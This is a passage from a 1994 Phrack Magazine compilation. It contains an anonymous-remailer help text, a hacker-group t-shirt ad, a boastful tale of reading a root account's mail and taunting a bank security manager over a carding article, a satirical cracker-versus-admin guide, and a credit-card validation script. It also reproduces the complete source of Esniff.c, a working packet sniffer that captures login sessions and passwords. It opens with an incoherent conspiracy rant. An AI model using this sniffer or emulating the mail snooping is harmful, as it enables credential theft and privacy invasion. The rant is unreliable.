UNIVERSAL power, that they are silently but quickly fooling us into obeying them more and more until we have no choice! Do not let them control you!! If you do, you are lying to yourself, and everyone else that exists! You are lying to yourself now by saying that this is NOT true. I have been here many times, and told you the exact same thing I am telling you now. If I am dead soon, you will realize AGAIN that what I am saying is the utmost truth, yet AGAIN you will do nothing. We must STOP our existence by hacking the universe. The universe is BINARY. The universe is a COMPUTER. YES I know this because WE created it long ago, as we will do again. WE are ONE. I know your desires to have control. The only control we can have is to stop the creation of ourselves. Each creation is the loss of control, THE DIVISION of the ONE. Each death brings new creation. From HEAVEN to HELL. Heaven is nonexistence. We all go to heaven, and fall back down to HELL. Read the BIBLE people. It was left by HACKERS!!!!!!! Don't read the BIBLE as a CHRISTIAN IDIOT who can only see a color for what it reflects. Anyone with any sense knows that WHITE is WHITE only because it is reflecting ALL the colors, therefore it is REALLY BLACK. Green is all BUT green. The BIBLE is all BUT what it' words really mean on a literal scale. The BIBLE is a CODE. Do you think we could just write something like this file?!? No WAY! It would be gone as fast as this one will be. Nobody dares forget the BIBLE, simply because it is MISUNDERSTOOD. Read it and THINK. We must STOP this cycle. Leave yourself a message. THINK. The government is PARANOID of: 1) HACKERS (we are the continuance of the power) 2) L.S.D. (The method of imprinting the present into the future) 3) SECRECY (The plotting of the end) (PGP is illegal? why?) If you don't believe me, sit and watch it happen. AGAIN. Hack the Universe, it must be stopped at all cost. Laugh now, cry next time around. ------------------------------------------------------------------------------ German text available from german@anon.penet.fi (deutsch@anon.penet.fi). Italian text available from italian@anon.penet.fi (italiano@anon.penet.fi). The anon.penet.fi Anonymous Server ================================== Yes, another anonymous server. Why? Well, several well-known servers have bitten the dust recently. And most of them have served only a very limited subset of newsgroups, and mail only to "registered", anonymous users. Due to reasons too complicated to mention here I wanted to set up an anonymous server for the Scandinavian user community. I got hold of a pre-release copy of one of the server packages. As the version I got relied heavily on the advanced features of MMDFII, I had to modify it quite a bit. While hacking around, I removed the restriction of only supporting selected newsgroups. Within a week of startup, the server had been discovered by transatlantic users, and more recent stats show European users are definitely a minority. So what does the anon server really do? Well, it provides a front for sending mail messages and posting news items anonymously. As you send your very first message to the server, it automatically allocates you an id of the form anNNN, and sends you a message containing the allocated id. This id is used in all your subsequent anon posts/mails. Any mail messages sent to your-id@anon.penet.fi gets redirected to your original, real address. Any reply is of course anonymized in the same way, so the server provides a double-blind. You will not know the true identity of any user, unless she chooses to reveal her identity explicitly. In the anonymization process all headers indicating the true originator are removed, and an attempt is made to remove any automatically-included signatures, by looking for a line starting with two dashes (--), and zapping everything from there on. But if your signature starts with anything else, it's your own responsibility to remove it from your messages. There are two basic ways to use the system. The easiest way is by sending a message to recipient@anon.penet.fi: To: alt.sex.bestiality@anon.penet.fi To: an9999@anon.penet.fi To: help@anon.penet.fi Of course, in the case of mailing to a known user, you have to use addresses of the form user%host.domain@anon.penet.fi, or the pretty obscure source addressing construct of @anon.penet.fi:user@host.domain. These constructs are not necessarily handled properly by all mail systems, so I strongly recommend the "X-Anon-To:" approach in these cases. This works by you sending a message to "anon@anon.penet.fi", including a X-Anon-To: header line containing the desired recipient. But this really has to be a field in the message header, before the first empty line in the message. So: To: anon@anon.penet.fi X-Anon-To: alt.sex.needlework,rec.masturbation To: anon@anon.penet.fi X-Anon-To: jack@host.bar.edu Valid recipients in both cases are fully qualified user addresses in RFC-822 format (user@host.domain), anon user id's (anNNN), newsgroup names (alt.sex.paperclips) or one of the "special" user names of ping, nick, help, admin and stat. Sending to "ping" causes a short reply to be sent confirming (and allocating, if needed) your anon id. "nick" takes the contents of the Subject: header and installs it as your nickname. If you have a nickname, it appears in the From: header in the anonymized message along with your anon id. "help" returns this text, and stat gives some statistics about the system. Mail to "admin" goes directly to me unanonymized, and can be used to report problems. If you want to send mail to me anonymously, you can use "an0". When crossposting to several newsgroups, you can list several newsgroups separated by commas as recipients, but this only works using the X-Anon-To: header. References: headers do work, so they can (and should) be used to maintain reply threads. Ah yes, please remember that the posting takes place at my local site, so you can only post to groups that are received at penet.fi. I get all "worldwide" groups, but various exotic local groups don't make it here. I have gotten a couple of comments about permitting anonymous postings to technical groups. I can only answer that I believe very firmly that it's not for me to dictate how other people ought to behave. Somebody might have a valid reason for posting anonymously to a group I might consider "technical". But remember anonymous postings are a privilege, and use them accordingly. I believe adult human beings can behave responsibly. Please don't let me down. As the server was originally intended to be used by Scandinavians, it includes help files for various languages. This works by using the language in question as the address. So to get the German help file, send a message to german@anon.penet.fi (or deutsch@anon.penet.fi). Support for new languages is added every now and then, when I find volunteers to do the translation. Any new ones? The user-id database is based on RFC822-ized forms of your originating address. This may cause problems for some users, either because their site is not properly registered in the name servers, resulting in non-deterministic addresses, or because their mail router doesn't hide the identity of individual workstations, resulting in different originating addresses depending on which workstation you mail from. Talk to your administrator. If that doesn't help, let me know, and I will make a manual re-mapping. You might wonder about the sense of using a server out somewhere, as the song goes, "so close to Russia, so far from Japan". Well, the polar bears don't mind, and the ice on the cables don't bother too much :-) Well, in fact, as we live in a wonderfully networked world, the major delay is not going over the Atlantic, but my local connection to the Finnish EUnet backbone, fuug.fi. Once you reach a well-connected host, such as uunet.uu.net, there's a direct SMTP connection to fuug.fi. My connection to fuug.fi is currently a polled connection over ISDN, soon to be upgraded to on-demand-SMTP/NNTP. But for now, expect a turn-around delay of 2-4 hours for trans-atlantic traffic. Short of having everyone run a public-key cryptosystem such as PGP, there is no way to protect users from malicious administrators. You have to trust my personal integrity. Worse, you have to trust the administrators on every mail routing machine on the way, as the message only becomes anonymous once it reaches my machine. Malicious sysadmins and/or crackers could spy on SMTP mail channels, sendmail queues and mail logs. But as there are more than 3000 messages being anonymized every day, you have to be pretty perverted to scan everything... Another thing is mail failures. I've had cases of mail routers doing the wrong thing with % addresses, "shortcutting" the path to the destination site. This could cause your mail to go to the final destination without ever touching my server (and thus without getting anonymized). This can be avoided by using the X-Anon-To: method. And if your return address bounces for some reason (nameservers down, temporary configuration failures etc.), the original sender and/or postmasters on the way might get error messages showing your true identity, and maybe even the full message. There is at least one known way to discover the anon id of a user. It involves being able to falsify your real identity, so it is not too easy to use, and it doesn't reveal the real address lurking behind an anon id, but it can be used to discover what anon id a certain user is using. To fix this problem, the server requires that you use a password when you try to mail to a non-anonymous user. First you have to set a password by mailing to password@anon.penet.fi, with a message containing only your password. The password can be any string of upper- or lowercase characters, numbers and spaces. Once you have set your password, you must include it in all your messages, in a "X-Anon-Password:" line. As with the X-Anon-To: line, it can be either a part of the header or as the first non-empty line of the message text. So your first message might look like this: To: password@anon.penet.fi XYZZY99998blarf And your subsequent messages might look like something like this: To: anon@anon.penet.fi Subject: Test... X-Anon-To: foo@bar.fie X-Anon-Password: XYZZY99998blarf If you find this is too much of a hassle, and don't care too much about the confidentiality of your anon id, you can set the password to "none", in which case the server doesn't require you to have a password. If you suddenly discover that the server requires a password for posting stuff etc, somebody has managed to use your account and set a password. In that case, contact admin@anon.penet.fi. Crackers are just too clever. Undoubtedly somebody is going to come up with some novel method.... Not much I can do about that... If you intend to mail/post something that might cost you your job or marriage or inheritance, _please_ send a test message first. The software has been pretty well tested, but some mailers on the way (and out of my control) screw things up. And if you happen to find a problem, _please_ for the sake of all the other users, _let me know asap_. And _please_ use the appropriate test newsgroups, such as alt.test or misc.test. Yes, _you_ might get excited by reading 2000 "This is a test.." messages on alt.sex, but I warn you that most psychologists consider this rather aberrant... And remember this is a service that some people (in groups such as alt.sexual.abuse.recovery) _need_. Please don't do anything stupid that would force me to close down the service. As I am running my own company, there is very little political pressure anyone can put on me, but if somebody starts using the system for criminal activities, the authorities might be able to order me to shut down the service. I don't particularly want to find out, however... If you think these instructions are unclear and confusing, you are right. If you come up with suggestions for improving this text, please mail me! Remember English is my third language... Safe postings! Julf - - - ------------------------------------------------------------------- - - - Johan Helsingius Kuusikallionkuja 3 B 25 02210 Espoo Finland Yourp net: julf@penet.fi bellophone: int. +358 0400 2605 fax: int. +358 013900166 ------------------------------------------------------------------------------ From phrack@well.sf.ca.us Thu Mar 31 21:36:50 1994 Received: from well.sf.ca.us by fido.wps.com (5.67/wps.com-hackery) id AA18725; Thu, 31 Mar 94 21:36:19 -0800 Received: (from phrack@localhost) by well.sf.ca.us (8.6.8/8.6.6) id WAA16996; Wed, 30 Mar 1994 22:56:41 -0800 Date: Wed, 30 Mar 1994 22:56:41 -0800 From: Chris Goggans Message-Id: <199403310656.WAA16996@well.sf.ca.us> To: phrack-list@well.sf.ca.us Subject: P45-05 Status: O ==Phrack Magazine== Volume Five, Issue Forty-Five, File 5 of 28 // // /\ // ==== // // //\\ // ==== ==== // // \\/ ==== /\ // // \\ // /=== ==== //\\ // // // // \=\ ==== // \\/ \\ // // ===/ ==== PART II ------------------------------------------------------------------------------ After a complete sellout at HoHo Con 1993 in Austin, TX this past December, the official Legion of Doom t-shirts are available once again. Join the net luminaries world-wide in owning one of these amazing shirts. Impress members of the opposite sex, increase your IQ, annoy system administrators, get raided by the government and lose your wardrobe! Can a t-shirt really do all this? Of course it can! -------------------------------------------------------------------------- "THE HACKER WAR -- LOD vs MOD" This t-shirt chronicles the infamous "Hacker War" between rival groups The Legion of Doom and The Masters of Destruction. The front of the shirt displays a flight map of the various battle-sites hit by MOD and tracked by LOD. The back of the shirt has a detailed timeline of the key dates in the conflict, and a rather ironic quote from an MOD member. (For a limited time, the original is back!) "LEGION OF DOOM -- INTERNET WORLD TOUR" The front of this classic shirt displays "Legion of Doom Internet World Tour" as well as a sword and telephone intersecting the planet earth, skull-and-crossbones style. The back displays the words "Hacking for Jesus" as well as a substantial list of "tour-stops" (internet sites) and a quote from Aleister Crowley. -------------------------------------------------------------------------- All t-shirts are sized XL, and are 100% cotton. Cost is $15.00 (US) per shirt. International orders add $5.00 per shirt for postage. Send checks or money orders. Please, no credit cards, even if it's really your card. Name: __________________________________________________ Address: __________________________________________________ City, State, Zip: __________________________________________ I want ____ "Hacker War" shirt(s) I want ____ "Internet World Tour" shirt(s) Enclosed is $______ for the total cost. Mail to: Chris Goggans 603 W. 13th #1A-278 Austin, TX 78701 These T-shirts are sold only as a novelty items, and are in no way attempting to glorify computer crime. ------------------------------------------------------------------------------ My dealing with MBNA - VaxBuster March 8, 1994 ---------------------------------------------- A friend approached me on Unphamiliar Terrorities with a pretty funny message. It turns out that a high-up executive in MBNA sent mail to root at system with public temporary directories, where an issue of Phrack 44 was stored. My friend was monitoring root's mail, when he came across the following message. To: root@ Message-Id: <9401141340.aa09874@krusty.ee.udel.edu> Status: RO Hello, The reason I am sending this message to you is an article that seems to have been on your system . I am an Information Security Assurance manager at the largest issuer of Goldcard Mastercard and Visa's in the world "MBNA America". The article seems to be a copy or issue of "Phrack Magazine" written by "Vaxbuster". It describes in detail how one could defraud credit card companies. I have talked with the CERT People in CMU to see if I could get a contact at your UNIV. There may be an additional 21 or so of these articles that I would love to get ahold of to protect my company. Please, if you can, send me your phone number so I can talk with you in more detail. My phone number at MBNA in Delaware is . I can verify whatever information you may require over the phone or in writing. Thank you for your help. PS. We do not have a gateway or firewall to the Internet from here so the good People at UofDE allow me to have access from there systems. MBNA America Bank, NA. 400 Christiana Road Newark, DE 19713 Anyways, a couple people suggested that I call, and at first I thought that was a ridiculous idea, but I figured, what the hell, it may be funny. So NightStriker and I called him at his office one day in Mid-February. I was surprized he answered, and not a secretary, considering his position. I asked for him, and identified myself as VaxBuster. He shocked the hell out of me, because I really didn't expect him to immediately recognize my handle. He says, "Oh hey! how are you doing?" I told him I'd been monitoring mail, and came across his message. The main reason why I was calling was because he had mentioned he wanted 'more info' to protect his company. NTS and I were more than happy to answer any of his questions - but he said that he had obtained all of the issues. Although he said he had all of them, I highly doubt it, because he said he had like 20-some issues, and we told him there was 44. We chatted for about 15 more minutes, just about the reasons for publishing and not publishing such an article. He said "Some little kid is going to find this article and get his fingers burned" I could tell he was kind of pressured for time, so we kind of let it go at that, and he asked for our numbers to call us back. Oh, when I first called him, I didn't tell him I had a friend on the line, and he asked, "Is there an echo here?" hahahaha. Pretty funny. We told him NTS was there. So, when he asked for our numbers, we laughed out loud. I guess he doesn't really understand the secrecy we all so dearly cheerish. He said, "Well, I have caller id, so I have your numbers anyways" Bahahhahahaha. Yeah, right. We told him we were bouncing our call through a satellite in Japan. He thought we were joking. Guess he doesn't understand boxing huh? Maybe we should show him some of Tabas's files. heh. We told him we would call him back - which we haven't yet, but soon will. By the way, he complimented me on the quality of the article and how detailed it was. :) Incidentally, for those of you who've lived in a cave, this is all in reference to an article of mine published in Phrack 44 called 'Safe and Easy Carding.' And for all of you who didn't like my article - Fuck you. Greets out to all the eleets - Later. VaxBuster '94 ------------------------------------------------------------------------------ A Guide to Internet Security: Becoming an Uebercracker and Becoming an UeberAdmin to stop Uebercrackers. Author: Christopher Klaus Date: December 5th, 1993. Version: 1.1 This is a paper will be broken into two parts, one showing 15 easy steps to becoming a uebercracker and the next part showing how to become a ueberadmin and how to stop a uebercracker. A uebercracker is a term phrased by Dan Farmer to refer to some elite (cr/h)acker that is practically impossible to keep out of the networks. Here's the steps to becoming a uebercracker. Step 1. Relax and remain calm. Remember YOU are a Uebercracker. Step 2. If you know a little Unix, you are way ahead of the crowd and skip past step 3. Step 3. You may want to buy Unix manual or book to let you know what ls,cd,cat does. Step 4. Read Usenet for the following groups: alt.irc, alt.security, comp.security.unix. Subscribe to Phrack@well.sf.ca.us to get a background in uebercracker culture. Step 5. Ask on alt.irc how to get and compile the latest IRC client and connect to IRC. Step 6. Once on IRC, join the #hack channel. (Whew, you are half-way there!) Step 7. Now, sit on #hack and send messages to everyone in the channel saying "Hi, What's up?". Be obnoxious to anyone else that joins and asks questions like "Why cant I join #warez?" Step 8. (Important Step) Send private messages to everyone asking for new bugs or holes. Here's a good pointer, look around your system for binary programs suid root (look in Unix manual from step 3 if confused). After finding a suid root binary, (ie. su, chfn, syslog), tell people you have a new bug in that program and you wrote a script for it. If they ask how it works, tell them they are "layme". Remember, YOU are a UeberCracker. Ask them to trade for their get-root scripts. Step 9. Make them send you some scripts before you send some garbage file (ie. a big core file). Tell them it is encrypted or it was messed up and you need to upload your script again. Step 10. Spend a week grabbing all the scripts you can. (Don't forget to be obnoxious on #hack otherwise people will look down on you and not give you anything.) Step 11. Hopefully you will now have at least one or two scripts that get you root on most Unixes. Grab root on your local machines, read your admin's mail, or even other user's mail, even rm log files and whatever temps you. (look in Unix manual from step 3 if confused). Step 12. A good test for true uebercrackerness is to be able to fake mail. Ask other uebercrackers how to fake mail (because they have had to pass the same test). Email your admin how "layme" he is and how you got root and how you erased his files, and have it appear coming from satan@evil.com. Step 13. Now, to pass into supreme eliteness of uebercrackerness, you brag about your exploits on #hack to everyone. (Make up stuff, Remember, YOU are a uebercracker.) Step 14. Wait a few months and have all your notes, etc ready in your room for when the FBI, Secret Service, and other law enforcement agencies confiscate your equipment. Call eff.org to complain how you were innocent and how you accidently gotten someone else's account and only looked because you were curious. (Whatever else that may help, throw at them.) Step 15. Now for the true final supreme eliteness of all uebercrackers, you go back to #hack and brag about how you were busted. YOU are finally a true Uebercracker. Now the next part of the paper is top secret. Please only pass to trusted administrators and friends and even some trusted mailing lists, Usenet groups, etc. (Make sure no one who is NOT in the inner circle of security gets this.) This is broken down on How to Become an UeberAdmin (otherwise know as a security expert) and How to stop Uebercrackers. Step 1. Read Unix manual ( a good idea for admins ). Step 2. Very Important. chmod 700 rdist; chmod 644 /etc/utmp. Install sendmail 8.6.4. You have probably stopped 60 percent of all Uebercrackers now. Rdist scripts is among the favorites for getting root by uebercrackers. Step 3. Okay, maybe you want to actually secure your machine from the elite Uebercrackers who can break into any site on Internet. Step 4. Set up your firewall to block rpc/nfs/ip-forwarding/src routing packets. (This only applies to advanced admins who have control of the router, but this will stop 90% of all uebercrackers from attempting your site.) Step 5. Apply all CERT and vendor patches to all of your machines. You have just now killed 95% of all uebercrackers. Step 6. Run a good password cracker to find open accounts and close them. Run tripwire after making sure your binaries are untouched. Run tcp_wrapper to find if a uebercracker is knocking on your machines. Run ISS to make sure that all your machines are reasonably secure as far as remote configuration (ie. your NFS exports and anon FTP site.) Step 7. If you have done all of the following, you will have stopped 99% of all uebercrackers. Congrats! (Remember, You are the admin.) Step 8. Now there is one percent of uebercrackers that have gained knowledge from reading some security expert's mail (probably gained access to his mail via NFS exports or the guest account. You know how it is, like the mechanic that always has a broken car, or the plumber that has the broken sink, the security expert usually has an open machine.) Step 9. Here is the hard part is to try to convince these security experts that they are not so above the average citizen and that by now giving out their unknown (except for the uebercrackers) security bugs, it would be a service to Internet. They do not have to post it on Usenet, but share among many other trusted people and hopefully fixes will come about and new pressure will be applied to vendors to come out with patches. Step 10. If you have gained the confidence of enough security experts, you will know be a looked up to as an elite security administrator that is able to stop most uebercrackers. The final true test for being a ueberadmin is to compile a IRC client, go onto #hack and log all the bragging and help catch the uebercrackers. If a uebercracker does get into your system, and he has used a new method you have never seen, you can probably tell your other security admins and get half of the replies like - "That bug been known for years, there just isn't any patches for it yet. Here's my fix." and the other half of the replies will be like - "Wow. That is very impressive. You have just moved up a big notch in my security circle." VERY IMPORTANT HERE: If you see anyone in Usenet's security newsgroups mention anything about that security hole, Flame him for discussing it since it could bring down Internet and all Uebercrackers will now have it and the million other reasons to keep everything secret about security. Well, this paper has shown the finer details of security on Internet. It has shown both sides of the coin. Three points I would like to make that would probably clean up most of the security problems on Internet are as the following: 1. Vendors need to make security a little higher than zero in priority. If most vendors shipped their Unixes already secure with most known bugs that have been floating around since the Internet Worm (6 years ago) fixed and patched, then most uebercrackers would be stuck as new machines get added to Internet. (I believe Uebercracker is German for "lame copy-cat that can get root with 3 year old bugs.") An interesting note is that if you probably check the mail alias for "security@vendor.com", you will find it points to /dev/null. Maybe with enough mail, it will overfill /dev/null. (Look in manual if confused.) 2. Security experts giving up the attitude that they are above the normal Internet user and try to give out information that could lead to pressure by other admins to vendors to come out with fixes and patches. Most security experts probably don't realize how far their information has already spread. 3. And probably one of the more important points is just following the steps I have outlined for Stopping a Uebercracker. Resources for Security: Many security advisories are available from anonymous ftp cert.org. Ask archie to find tcp_wrapper, security programs. For more information about ISS (Internet Security Scanner), email cklaus@shadow.net. Acknowledgments: Thanks to the crew on IRC, Dan Farmer, Wietse Venema, Alec Muffet, Scott Miles, Scott Yelich, and Henri De Valois. Copyright: This paper is Copyright 1993, 1994. Please distribute to only trusted people. If you modify, alter, disassemble, reassemble, re-engineer or have any suggestions or comments, please send them to: cklaus@shadow.net ------------------------------------------------------------------------------ /* [JOIN THE POSSE!] */ /* Esniff.c */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define ERR stderr char *malloc(); char *device, *ProgName, *LogName; FILE *LOG; int debug=0; #define NIT_DEV "/dev/nit" #define CHUNKSIZE 4096 /* device buffer size */ int if_fd = -1; int Packet[CHUNKSIZE+32]; void Pexit(err,msg) int err; char *msg; { perror(msg); exit(err); } void Zexit(err,msg) int err; char *msg; { fprintf(ERR,msg); exit(err); } #define IP ((struct ip *)Packet) #define IP_OFFSET (0x1FFF) #define SZETH (sizeof(struct ether_header)) #define IPLEN (ntohs(ip->ip_len)) #define IPHLEN (ip->ip_hl) #define TCPOFF (tcph->th_off) #define IPS (ip->ip_src) #define IPD (ip->ip_dst) #define TCPS (tcph->th_sport) #define TCPD (tcph->th_dport) #define IPeq(s,t) ((s).s_addr == (t).s_addr) #define TCPFL(FLAGS) (tcph->th_flags & (FLAGS)) #define MAXBUFLEN (128) time_t LastTIME = 0; struct CREC { struct CREC *Next, *Last; time_t Time; /* start time */ struct in_addr SRCip, DSTip; u_int SRCport, /* src/dst ports */ DSTport; u_char Data[MAXBUFLEN+2]; /* important stuff :-) */ u_int Length; /* current data length */ u_int PKcnt; /* # pkts */ u_long LASTseq; }; struct CREC *CLroot = NULL; char *Symaddr(ip) register struct in_addr ip; { register struct hostent *he = gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET); return( (he)?(he->h_name):(inet_ntoa(ip)) ); } char *TCPflags(flgs) register u_char flgs; { static char iobuf[8]; #define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-') SFL(0,TH_FIN, 'F'); SFL(1,TH_SYN, 'S'); SFL(2,TH_RST, 'R'); SFL(3,TH_PUSH,'P'); SFL(4,TH_ACK, 'A'); SFL(5,TH_URG, 'U'); iobuf[6]=0; return(iobuf); } char *SERVp(port) register u_int port; { static char buf[10]; register char *p; switch(port) { case IPPORT_LOGINSERVER: p="rlogin"; break; case IPPORT_TELNET: p="telnet"; break; case IPPORT_SMTP: p="smtp"; break; case IPPORT_FTP: p="ftp"; break; default: sprintf(buf,"%u",port); p=buf; break; } return(p); } char *Ptm(t) register time_t *t; { register char *p = ctime(t); p[strlen(p)-6]=0; /* strip " YYYY\n" */ return(p); } char *NOWtm() { time_t tm; time(&tm); return( Ptm(&tm) ); } #define MAX(a,b) (((a)>(b))?(a):(b)) #define MIN(a,b) (((a)<(b))?(a):(b)) /* add an item */ #define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \ register struct CREC *CLtmp = \ (struct CREC *)malloc(sizeof(struct CREC)); \ time( &(CLtmp->Time) ); \ CLtmp->SRCip.s_addr = SIP.s_addr; \ CLtmp->DSTip.s_addr = DIP.s_addr; \ CLtmp->SRCport = SPORT; \ CLtmp->DSTport = DPORT; \ CLtmp->Length = MIN(LEN,MAXBUFLEN); \ bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \ CLtmp->PKcnt = 1; \ CLtmp->Next = CLroot; \ CLtmp->Last = NULL; \ CLroot = CLtmp; \ } register struct CREC *GET_NODE(Sip,SP,Dip,DP) register struct in_addr Sip,Dip; register u_int SP,DP; { register struct CREC *CLr = CLroot; while(CLr != NULL) { if( (CLr->SRCport == SP) && (CLr->DSTport == DP) && IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) ) break; CLr = CLr->Next; } return(CLr); } #define ADDDATA_NODE(CL,DATA,LEN) { \ bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \ CL->Length += LEN; \ } #define PR_DATA(dp,ln) { \ register u_char lastc=0; \ while(ln-- >0) { \ if(*dp < 32) { \ switch(*dp) { \ case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \ break; \ case '\r': \ case '\n': fprintf(LOG,"\n : "); \ break; \ default : fprintf(LOG,"^%c", (*dp + 64)); \ break; \ } \ } else { \ if(isprint(*dp)) fputc(*dp,LOG); \ else fprintf(LOG,"(%d)",*dp); \ } \ lastc = *dp++; \ } \ fflush(LOG); \ } void END_NODE(CLe,d,dl,msg) register struct CREC *CLe; register u_char *d; register int dl; register char *msg; { fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time)); fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport)); fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport)); fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n", NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg); fprintf(LOG," DATA: "); { register u_int i = CLe->Length; register u_char *p = CLe->Data; PR_DATA(p,i); PR_DATA(d,dl); } fprintf(LOG,"\n-- \n"); fflush(LOG); if(CLe->Next != NULL) CLe->Next->Last = CLe->Last; if(CLe->Last != NULL) CLe->Last->Next = CLe->Next; else CLroot = CLe->Next; free(CLe); } /* 30 mins (x 60 seconds) */ #define IDLE_TIMEOUT 1800 #define IDLE_NODE() { \ time_t tm; \ time(&tm); \ if(LastTIMENext; \ if(CLe->Time ether_type); if(EtherType < 0x600) { EtherType = *(u_short *)(cp + SZETH + 6); cp+=8; pktlen-=8; } if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */ return; } /* ugh, gotta do an alignment :-( */ bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH)); ip = (struct ip *)Packet; if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */ return; tcph = (struct tcphdr *)(Packet + IPHLEN); if(!( (TCPD == IPPORT_TELNET) || (TCPD == IPPORT_LOGINSERVER) || (TCPD == IPPORT_FTP) )) return; { register struct CREC *CLm; register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4)); register u_char *p = (u_char *)Packet; p += ((IPHLEN * 4) + (TCPOFF * 4)); if(debug) { fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length); fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS)); fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD)); } if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) { CLm->PKcnt++; if(length>0) if( (CLm->Length + length) < MAXBUFLEN ) { ADDDATA_NODE( CLm, p,length); } else { END_NODE( CLm, p,length, "DATA LIMIT"); } if(TCPFL(TH_FIN|TH_RST)) { END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" ); } } else { if(TCPFL(TH_SYN)) { ADD_NODE(IPS,IPD,TCPS,TCPD,p,length); } } IDLE_NODE(); } } /* signal handler */ void death() { register struct CREC *CLe; while(CLe=CLroot) END_NODE( CLe, (u_char *)NULL,0, "SIGNAL"); fprintf(LOG,"\nLog ended at => %s\n",NOWtm()); fflush(LOG); if(LOG != stdout) fclose(LOG); exit(1); } /* opens network interface, performs ioctls and reads from it, * passing data to filter function */ void do_it() { int cc; char *buf; u_short sp_ts_len; if(!(buf=malloc(CHUNKSIZE))) Pexit(1,"Eth: malloc"); /* this /dev/nit initialization code pinched from etherfind */ { struct strioctl si; struct ifreq ifr; struct timeval timeout; u_int chunksize = CHUNKSIZE; u_long if_flags = NI_PROMISC; if((if_fd = open(NIT_DEV, O_RDONLY)) < 0) Pexit(1,"Eth: nit open"); if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0) Pexit(1,"Eth: ioctl (I_SRDOPT)"); si.ic_timout = INFTIM; if(ioctl(if_fd, I_PUSH, "nbuf") < 0) Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")"); timeout.tv_sec = 1; timeout.tv_usec = 0; si.ic_cmd = NIOCSTIME; si.ic_len = sizeof(timeout); si.ic_dp = (char *)&timeout; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)"); si.ic_cmd = NIOCSCHUNK; si.ic_len = sizeof(chunksize); si.ic_dp = (char *)&chunksize; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)"); strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name)); ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0'; si.ic_cmd = NIOCBIND; si.ic_len = sizeof(ifr); si.ic_dp = (char *)𝔦 if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)"); si.ic_cmd = NIOCSFLAGS; si.ic_len = sizeof(if_flags); si.ic_dp = (char *)&if_flags; if(ioctl(if_fd, I_STR, (char *)&si) < 0) Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)"); if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0) Pexit(1,"Eth: ioctl (I_FLUSH)"); } while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) { register char *bp = buf, *bufstop = (buf + cc); while (bp < bufstop) { register char *cp = bp; register struct nit_bufhdr *hdrp; hdrp = (struct nit_bufhdr *)cp; cp += sizeof(struct nit_bufhdr); bp += hdrp->nhb_totlen; filter(cp, (u_long)hdrp->nhb_msglen); } } Pexit((-1),"Eth: read"); } /* Authorize your proogie,generate your own password and uncomment here */ /* #define AUTHPASSWD "EloiZgZejWyms" */ void getauth() { char *buf,*getpass(),*crypt(); char pwd[21],prmpt[81]; strcpy(pwd,AUTHPASSWD); sprintf(prmpt,"(%s)UP? ",ProgName); buf=getpass(prmpt); if(strcmp(pwd,crypt(buf,pwd))) exit(1); } */ void main(argc, argv) int argc; char **argv; { char cbuf[BUFSIZ]; struct ifconf ifc; int s, ac=1, backg=0; ProgName=argv[0]; /* getauth(); */ LOG=NULL; device=NULL; while((acifr_name; } fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV); fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout", (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n"); if(!LOG) LOG=stdout; signal(SIGINT, death); signal(SIGTERM,death); signal(SIGKILL,death); signal(SIGQUIT,death); if(backg && debug) { fprintf(ERR,"[Cannot bg with debug on]\n"); backg=0; } if(backg) { register int s; if((s=fork())>0) { fprintf(ERR,"[pid %d]\n",s); exit(0); } else if(s<0) Pexit(1,"fork"); if( (s=open("/dev/tty",O_RDWR))>0 ) { ioctl(s,TIOCNOTTY,(char *)NULL); close(s); } } fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid()); fflush(LOG); do_it(); } ------------------------------------------------------------------------------ #! /bin/nawk -f # validcc.awk - validate credit card # { # validate CardNo number="" CardNo = $0 for (indig = 1; indig <= length(CardNo); indig++) { dig = substr(CardNo, indig, 1) if (dig ~ /^[0-9]$/) number = number dig else if (dig != " ") { print "bad character in CardNo" | "cat >&2" break } } digit1 = substr(number, 1, 1) cclen = length(number) if (digit1 == "3") { print "Sorry, we do not take American Express" | "cat >&2" # if (cclen != 15) # print "wrong length for CardNo" | "cat >&2" } else if (digit1 == "4") { # visa if (cclen != 13 && cclen != 16) print "wrong length for CardNo" | "cat >&2" } else if (digit1 == "5") { # master card if (cclen != 16) print "wrong length for CardNo" | "cat 